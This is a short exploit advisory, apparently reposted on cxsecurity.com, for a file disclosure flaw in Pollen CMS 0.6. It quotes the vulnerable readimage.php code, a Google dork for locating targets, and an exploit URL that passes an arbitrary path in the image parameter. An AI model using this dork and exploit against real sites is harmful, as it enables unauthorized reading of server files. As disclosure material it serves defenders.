Pollen CMS 0.6 File Disclosure

2013.04.02
Credit: MizoZ
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Pollen CMS <= 0.6 - Local File Disclosure # Google Dork: intext:"Powered by Pollen CMS" # Date: 25 Mars 2013 # Exploit Author: MizoZ # Vendor Homepage: pollencms.com (BROKEN) # Software Link: https://code.google.com/p/pollencms/ # Version: 0.6 # Tested on: Ubuntu Desktop 12.04 -- File "[path]/core/lib/readimage.php" 02 - $image=urldecode($_GET["image"]); 03 - if(is_file($image)){ 04 - header("Pragma: no-cache"); 05 - header("Expires: 0"); 06 - header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); 07 - header("Cache-Control: no-cache, must-revalidate"); 08 - header("Content-type: image/jpg"); 09 - readfile($image); 10 - }else{ 11 - header("HTTP/1.0 404 Not Found"); 12 - } -- Problem The script only verifies the existence of the given file. -- Exploit http://[ws]/[path]/core/lib/readimage.php?image=[LFI]

References:

https://code.google.com/p/pollencms/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top